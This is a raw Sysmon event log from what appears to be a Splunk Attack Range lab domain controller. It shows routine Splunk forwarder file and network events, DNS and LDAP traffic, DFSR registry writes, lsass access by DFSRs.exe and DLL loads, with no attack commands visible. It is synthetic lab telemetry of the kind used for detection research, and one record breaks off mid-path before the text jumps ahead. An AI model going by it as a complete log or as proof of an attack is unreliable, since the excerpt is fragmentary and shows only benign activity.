13:05:17.167{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53339-false10.0.1.12-8000- 23542300x800000000000000099914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:21.037{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD8138F397B04702CFF10DEC4E8D0EE5,SHA256=1B3B057A2243F42305BD4ABA4E54281F26E17197BEB465B2B2C1D872120F8D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:22.130{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1342439F078087ACC2F72EBB5DB7D414,SHA256=F852D30C6EF5A3ABD014D596CD6634107C5572A9CE703C2C7C2753507C220B70,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:23.677{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:23.224{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20BE75A3B51839AEF7D91B8B520031AD,SHA256=09E646C6FCF87E083FDA06E527931924541909E38DC666E58398530106D92A57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000099918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:24.318{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F48EE036B3C5E146A8380A2BA1CFAB2,SHA256=DDC715BC442F776E89CB6EDDEBC9C06F14F7C02E00DC0B8FBBD8727C4EAE7860,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:21.573{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53340-false10.0.1.12-8089- 23542300x800000000000000099919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:25.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A1DD3E0587E1020F45768F401C3ABA0,SHA256=CB9EEEE57A7FC29F30D5CEEB90D5E3C3E44B4542319CB6D49493E898C2ED9D3C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:26.521{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A54151795FD425F50AA8E9EAE8DE7CA,SHA256=E16789C41F531F579ED6152EAE99C00A24A740A5688A43EB17FCA0896DD8412D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:23.073{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53341-false10.0.1.12-8000- 23542300x800000000000000099922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:27.615{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=618A6123D2224B5333B954B2EC74C050,SHA256=4238E044264083254B73159A560BF4C97F802E7B6BBC44A3B4DCC872700F503B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.708{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87D95B2EB442C36DC69B3403BAA7A7FE,SHA256=04522FD26D5DA19077B8A7E36F1412CAEA5DF1A3A4FCA7ECFBD28F4744103ACC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.818{326FD73D-A45C-6294-5601-000000005502}6368NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB0EC239A4CB3D3AE5016E70C167011,SHA256=D9F3D2F8BA66D622CE1A6A1EDF922CC709C3A4FDB3D99B0B36732D0F658BC9F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.912{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2F7AF708E4849B44AE6D8B6E5A788B2,SHA256=B638D85DEAF367F33A05E64699D23DC45B3F8335D57CB348375243A0AA4D5564,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000099930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:05:30.552{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\16DF8A53-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_16DF8A53-0000-0000-0000-100000000000.XML 13241300x800000000000000099929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:05:30.537{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\92512667-BFCB-4F03-88F3-5CBAAC70C21C\Config SourceDWORD (0x00000001) 13241300x800000000000000099928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 
13:05:30.537{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\92512667-BFCB-4F03-88F3-5CBAAC70C21C\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_92512667-BFCB-4F03-88F3-5CBAAC70C21C.XML 10341000x800000000000000099927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:30.537{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:30.537{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000099940Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.467{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local50053- 354300x800000000000000099939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.465{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53478-false10.0.0.2ip-10-0-0-2.us-east-2.compute.internal53domain 354300x800000000000000099938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.465{326FD73D-A262-6294-2A00-000000005502}2932C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local56925- 
354300x800000000000000099937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.465{326FD73D-A254-6294-1300-000000005502}984C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local56925-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53domain 354300x800000000000000099936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.450{326FD73D-A254-6294-0D00-000000005502}908C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53342-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 354300x800000000000000099935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:28.450{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local53342-truefe80:0:0:0:6d77:2ba8:d8c7:bf95win-dc-ctus-attack-range-994.attackrange.local135epmap 10341000x800000000000000099934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:31.396{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:31.396{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:31.396{326FD73D-A253-6294-0B00-000000005502}632844C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000099948Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.307{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53344-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099947Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.307{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53344-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x800000000000000099946Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:29.011{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53343-false10.0.1.12-8000- 
23542300x800000000000000099945Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.490{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5EAB004D3DFDB783681C97EAF5ED28C,SHA256=431FE36977690FA18CBC4C51F0976A10128495878F5D6E5D632E5F8C0FED8DF0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000099944Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.240{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099943Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:32.240{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000099942Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:32.240{326FD73D-A253-6294-0B00-000000005502}632680C:\Windows\system32\lsass.exe{326FD73D-A262-6294-2900-000000005502}2896C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000099941Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 
13:05:32.005{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=320ED28F964D5944CFFAABBE2FC85412,SHA256=534680AEE7642D5F36067E5BABEC7D9C3B7F5AFD87FA458977CF1C6BFF418A88,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099949Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:33.099{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3C2D91B3F046262CEA042147DD622FC,SHA256=462F0A6E70A9B24A7D695BB4CD7AA304587777001EA018DDC0CE22840617BF41,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099950Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:34.193{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4564B205FF212E05680634DF8BB41C0B,SHA256=E3146C6A23BB8D4D4934768C4EF63B0143563B1B3737074AFC4F9E96B4C798A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099953Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:35.286{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid 
734700x8000000000000000100068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x8000000000000000100067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x8000000000000000100066Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:46.904{326FD73D-C12A-6294-400B-000000005502}5492C:\Program 